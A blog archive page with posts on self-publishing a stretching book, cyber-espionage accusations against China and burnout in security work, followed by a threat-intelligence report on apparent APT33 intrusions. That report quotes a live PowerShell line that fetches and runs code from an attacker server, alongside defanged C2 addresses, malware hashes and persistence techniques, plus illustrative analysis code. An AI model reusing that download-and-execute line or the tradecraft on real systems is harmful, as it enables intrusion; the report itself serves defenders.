Monthly Archives: December 2018

Notes on Self-Publishing a Book


In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. 14 years is an eternity in the publishing world, and even in the last 5 years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We met prior to my interest in this book, because I had wondered about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettlebells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

CYBER ESPIONAGE ACCUSATIONS AGAINST CHINA

IN BRIEF: Australia, the United States, and the United Kingdom have accused China of conducting cyber espionage against their own nations and allied nations. The accusations state that China was involved in stealing confidential commercial information from governments and technology companies.
---------------------------
I have explained on several occasions the new and dangerous direction of cybercrime, warning about cyber warfare and cyber espionage, in which major nations are now investing more heavily in using technology to harm and intrude on other nations online.

China's APT-10 group has been accused by the United Kingdom and the United States of breaching approximately 45 technology companies, the personal information of approximately 100,000 U.S. Navy personnel, and various computers belonging to NASA.



Zhu Hua and Zhang Shilong, both Chinese nationals, have been charged by the United States with carrying out cyberattacks on behalf of the Chinese Ministry of State Security. U.S. Deputy Attorney General Rod Rosenstein described the charges.

China has denied the accusations made against it by the United States and the United Kingdom, and has called on the United States to withdraw the charges against its two citizens. The effects of the alleged activity are said to have reached approximately 12 other countries, including Brazil, Japan, France, Canada, and others.

Similar accusations have also been made by one nation against another. Russia, North Korea, the United States, the United Kingdom, and China are the nations most often named as engaging in cyber espionage, and they appear to be strengthening their capacity to carry out cyberattacks against other nations.



Alongside this, we have seen major growth in companies offering cybercrime services such as “Malware-as-a-service”, “Ransomware-as-a-service”, and “Cyberattacks on demand”, which has caused cybercrime to keep accelerating in many parts of the world.

Recently, the U.S. Federal Bureau of Investigation (FBI) shut down several companies that provided cyberattack services to their customers.

The FBI stated that the companies it shut down had been offering services used to attack financial institutions, schools, government agencies, internet service providers, and so on.

critical-boot.com, ragebooter.com, downthem.org, and quantumstress.net are just some of those caught up in the wave of shutdowns carried out by the FBI after a major operation against companies involved in cybercrime services.

In addition, statistics for this end-of-year holiday season show that cybercrime is growing rapidly, and we have been witnessing many cybercrime incidents that lead to major losses of money and of information belonging to individuals and various companies.

To take an example from our East African nations: in Kenya, according to statistics released by the Communications Authority of Kenya (CA), more than 3.8 million cybercrime incidents were detected in a period of just three months. Detailed information on this has been published by Kenya's "STANDARD MEDIA".

Let me take this opportunity to advise greater care when using the internet, especially online banking services, and to urge stronger protection of our networked systems in order to reduce the size of the problem.

Managing Burnout

This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.

(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of information security.

In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)

In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties and consulting. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

During this period I decided that I did not want to open a Krav Maga school and quit my school's instructor development program. For the second time, I had quit something I had once considered very important.

I started a new project, though -- writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

My advice to those of you who have made it this far:

If you're feeling burnout now, you're not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It's healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

Even if you can't take a break, consider integrating non-security activities into your lifestyle -- the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

If you're not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you're not working in security. I recommend at least a month, but up to six months if you can manage it.

This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though -- this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

Finally, it's ok to talk to other people about this. This will likely be a private conversation. I don't see too many people saying "I'm burned out!" on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

I'm very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis.

FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33.

This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.
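As a rough illustration of the document-clustering idea mentioned in this section, the sketch below treats each intrusion as a "document" of observed features and scores pairs with TF-IDF-weighted cosine similarity. This is not FireEye's engine, whose internals are not described here; the intrusion names, feature labels, and weighting scheme are all assumptions chosen for illustration.

```python
import math
from collections import Counter

# Hypothetical feature sets. The labels are illustrative and only loosely
# based on tool names that appear in this post.
intrusions = {
    "intrusion_2017_11": ["ruler", "autoit_downloader", "powersploit", "pupyrat", "mimikatz"],
    "intrusion_2018_07": ["ruler", "ruler_homepage", "poshc2", "powerton", "autoit_downloader"],
    "unrelated_case": ["macro_doc", "cobalt_strike", "mimikatz"],
}


def tfidf_vectors(docs):
    """Weight each feature by term frequency times a smoothed inverse document frequency."""
    n = len(docs)
    doc_freq = Counter(f for feats in docs.values() for f in set(feats))
    vectors = {}
    for name, feats in docs.items():
        term_freq = Counter(feats)
        vectors[name] = {
            f: count * (math.log((1 + n) / (1 + doc_freq[f])) + 1.0)
            for f, count in term_freq.items()
        }
    return vectors


def cosine(a, b):
    """Cosine similarity between two sparse vectors stored as dicts."""
    dot = sum(w * b.get(f, 0.0) for f, w in a.items())
    norm_a = math.sqrt(sum(w * w for w in a.values()))
    norm_b = math.sqrt(sum(w * w for w in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


vectors = tfidf_vectors(intrusions)
related = cosine(vectors["intrusion_2017_11"], vectors["intrusion_2018_07"])
unrelated = cosine(vectors["intrusion_2017_11"], vectors["unrelated_case"])
print(f"related pair: {related:.3f}, unrelated pair: {unrelated:.3f}")
```

A score like this would only generate investigative leads. As the post stresses, the attribution judgment itself still rests on follow-on analysis.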

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one of which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.
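To make the import-hash comparison concrete, here is a minimal sketch of grouping samples by a simplified import hash. It follows the commonly used scheme as I understand it (lowercased "library.function" pairs in import-table order, joined by commas, then MD5), but it ignores ordinal-only imports and does not parse real PE files. The sample names and import lists are hypothetical; only the 6-of-168 figure comes from the text above.

```python
import hashlib
from collections import Counter

# File extensions dropped from the library name before hashing.
STRIPPED_EXTENSIONS = ("dll", "ocx", "sys")


def simplified_imphash(imports):
    """Hash an ordered list of (library, function) import name pairs."""
    parts = []
    for library, function in imports:
        name = library.lower()
        stem, dot, ext = name.rpartition(".")
        if dot and ext in STRIPPED_EXTENSIONS:
            name = stem
        parts.append(f"{name}.{function.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


# Hypothetical import tables for three samples.
samples = {
    "sample_a": [("KERNEL32.dll", "LoadLibraryA"), ("KERNEL32.dll", "GetProcAddress")],
    "sample_b": [("kernel32.DLL", "loadlibrarya"), ("kernel32.dll", "getprocaddress")],
    "sample_c": [("WS2_32.dll", "connect"), ("KERNEL32.dll", "LoadLibraryA")],
}

# Count how many samples share each import hash.
by_hash = Counter(simplified_imphash(imps) for imps in samples.values())

# Share of the 168 collected samples that carried the actor's IMPHASH.
share = 6 / 168
print(f"{share:.1%} of samples shared the actor's import hash")
```

Because the hash depends only on names and their order, samples built from the same source and toolchain tend to collide, which is why a rare shared value is notable but, as stated above, not sufficient for attribution.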

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this time.  The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”.  During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to guardrail an intrusion by time and this functionality is built into the framework.
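For analysts building a timeline, the kill-date guardrail reduces to a date comparison. The sketch below is not POSHC2's code; it assumes an implant refuses to run from the kill date onward (the exact boundary behavior is an assumption) and uses the two kill dates reported in this post. The function name and the sample observation dates are hypothetical.

```python
from datetime import date

# Kill dates reported in this post for the two waves of POSHC2 activity.
KILL_DATES = {
    "july_2018_wave": date(2018, 7, 29),
    "august_2018_wave": date(2018, 8, 13),
}


def implant_expired(on_day, kill_date):
    """Return True if an implant with this kill date would no longer run on on_day.

    Assumption: the implant stops working on the kill date itself.
    """
    return on_day >= kill_date


# Hypothetical observation dates, used to ask whether a given wave's
# implants could still have been active at the time.
print(implant_expired(date(2018, 7, 16), KILL_DATES["july_2018_wave"]))
print(implant_expired(date(2018, 8, 29), KILL_DATES["august_2018_wave"]))
```

A check like this helps explain a change in tradecraft: activity seen after a wave's kill date cannot come from that wave's stagers, so the actor must have redeployed or switched delivery methods.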

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).
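The indicators in this post are written in a defanged form ("hxxp" for the scheme and "[.]" for the last dot of the host) so they cannot be clicked by accident. Tooling that consumes them usually needs the original form back. The helpers below are a minimal sketch of that convention as it appears in this post; the function names are my own, and other defanging styles are not handled.

```python
def refang(indicator):
    """Convert a defanged indicator back to its original form."""
    if indicator.startswith("hxxp"):
        indicator = "http" + indicator[4:]
    return indicator.replace("[.]", ".")


def defang(url):
    """Defang a URL in this post's style: hxxp scheme, last host dot bracketed."""
    scheme, sep, rest = url.partition("://")
    if not sep:
        # No scheme present, so treat the whole string as host plus path.
        scheme, rest = "", url
    host, slash, path = rest.partition("/")
    head, dot, tail = host.rpartition(".")
    if dot:
        host = f"{head}[.]{tail}"
    scheme = scheme.replace("http", "hxxp")
    return f"{scheme}{sep}{host}{slash}{path}"


# Indicators copied from this post, kept in their defanged form.
indicators = [
    "hxxp://91.235.116[.]212/index.html",
    "hxxps://85.206.161[.]216:8080/HomePage.htm",
    "hxxps://basepack[.]org",
]

for item in indicators:
    # Round-trip each indicator to confirm the two helpers agree.
    assert defang(refang(item)) == item
```

Refanged values should stay inside blocklists and detection tooling; anything pasted into a report or chat is safer left defanged.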

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC)     | NOTE                                   | INDICATOR
2017-08-15 17:06:59 | APT33 – EMPIRE (Used)                  | 8a99624d224ab3378598b9895660c890
2017-09-15 16:49:59 | APT33 – PUPYRAT (Compiled)             | 4b19bccc25750f49c2c1bb462509f84e
2017-11-12 20:42:43 | GroupA – AUT2EXE Downloader (Compiled) | 95f3bea43338addc1ad951cd2d42eb6f
2017-11-14 14:55:14 | GroupA – PUPYRAT (Used)                | 17587668ac577fce0b278420b8eb72ac
2018-01-09 19:15:16 | APT33 – PUPYRAT (Compiled)             | 56f5891f065494fdbb2693cfc9bce9ae
2018-02-13 13:35:06 | APT33 – PUPYRAT (Used)                 | 56f5891f065494fdbb2693cfc9bce9ae
2018-05-09 18:28:43 | GroupB – AUT2EXE (Compiled)            | 46038aa5b21b940099b0db413fa62687
2018-07-02 07:57:40 | APT33 – POSHC2 (Used)                  | fa7790abe9ee40556fb3c5524388de0b
2018-07-16 00:33:01 | GroupB – POSHC2 (Compiled)             | 75e680d5fddbdb989812c7ba83e7c425
2018-07-16 01:39:58 | GroupB – POSHC2 (Used)                 | 75e680d5fddbdb989812c7ba83e7c425
2018-07-16 08:36:13 | GroupB – POWERTON (Used)               | 46038aa5b21b940099b0db413fa62687
2018-07-31 22:09:25 | APT33 – POSHC2 (Used)                  | 129c296c363b6d9da0102aa03878ca7f
2018-08-06 16:27:05 | GroupB – POSHC2 (Compiled)             | fca0ad319bf8e63431eb468603d50eff
2018-08-07 05:10:05 | GroupB – POSHC2 (Used)                 | 75e680d5fddbdb989812c7ba83e7c425
2018-08-29 18:14:18 | APT33 – POSHC2 (Used)                  | 5832f708fd860c88cbdc088acecec4ea
2018-10-09 16:02:55 | APT33 – POSHC2 (Used)                  | 8d3fe1973183e1d3b0dbec31be8ee9dd
2018-10-09 16:48:09 | APT33 – POSHC2 (Used)                  | 48d1ed9870ed40c224e50a11bf3523f8
2018-10-11 21:29:22 | GroupB – POWERTON (Used)               | 8be06571e915ae3f76901d52068e3498
2018-12-13 11:00:00 | GroupB – POWERTON (Identified)         | 99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline
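One way to read the operational timeline is to ask when each cluster first used a given tool. The sketch below does that for a handful of rows copied from Table 1. The tuple layout and the function name are my own choices, and the result is only the kind of circumstantial overlap the post describes, not evidence of attribution.

```python
from datetime import datetime

# A subset of rows from Table 1: (timestamp UTC, cluster, tool, action).
events = [
    ("2017-11-14 14:55:14", "GroupA", "PUPYRAT", "Used"),
    ("2018-02-13 13:35:06", "APT33", "PUPYRAT", "Used"),
    ("2018-07-02 07:57:40", "APT33", "POSHC2", "Used"),
    ("2018-07-16 01:39:58", "GroupB", "POSHC2", "Used"),
    ("2018-07-31 22:09:25", "APT33", "POSHC2", "Used"),
    ("2018-08-07 05:10:05", "GroupB", "POSHC2", "Used"),
]


def first_use(rows, tool):
    """Return the earliest 'Used' timestamp per cluster for one tool."""
    earliest = {}
    for stamp, cluster, row_tool, action in rows:
        if row_tool != tool or action != "Used":
            continue
        when = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")
        if cluster not in earliest or when < earliest[cluster]:
            earliest[cluster] = when
    return earliest


poshc2 = first_use(events, "POSHC2")
gap = poshc2["GroupB"] - poshc2["APT33"]
print(f"GroupB first used POSHC2 {gap.days} days after APT33")
```

On these rows the gap is about two weeks, which matches the post's observation that APT33 was using POSHC2 by July 2, 2018, shortly before the mid-July intrusion.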

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and an auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and use AES encryption for traffic to and from the C2. POWERTON is typically deployed as a later-stage backdoor and is obfuscated with several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)    | Hash of Deobfuscated File (MD5)  | Version
974b999186ff434bee3ab6d61411731f | 3871aac486ba79215f2155f32d581dc2 | V1
e2d60bb6e3e67591e13b6a8178d89736 | 2cd286711151efb61a15e2e11736d7d2 | V1
bd80fcf5e70a0677ba94b3f7c011440e | 5a66480e100d4f14e12fceb60e91371d | V1
4047e238bbcec147f8b97d849ef40ce5 | f5ac89d406e698e169ba34fea59a780e | V2
c38069d0bc79acdc28af3820c1123e53 | 4aca006b9afe85b1f11314b39ee270f7 | V2
N/A                              | 7f4f7e307a11f121d8659ca98bc8ba56 | V2
53ae59ed03fa5df3bf738bc0775a91d9 | 99649d58c0d502b2dfada02124b1504c | V2

Table 2: POWERTON malware samples
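For defenders who want to sweep a directory for the samples in Table 2, the following is a minimal sketch using only the Python standard library. The function names and the directory-walking approach are illustrative assumptions, not FireEye tooling; the hash set is copied from Table 2.

```python
import hashlib
from pathlib import Path

# MD5 values copied from Table 2 (obfuscated and deobfuscated POWERTON samples).
POWERTON_MD5 = {
    "974b999186ff434bee3ab6d61411731f", "3871aac486ba79215f2155f32d581dc2",
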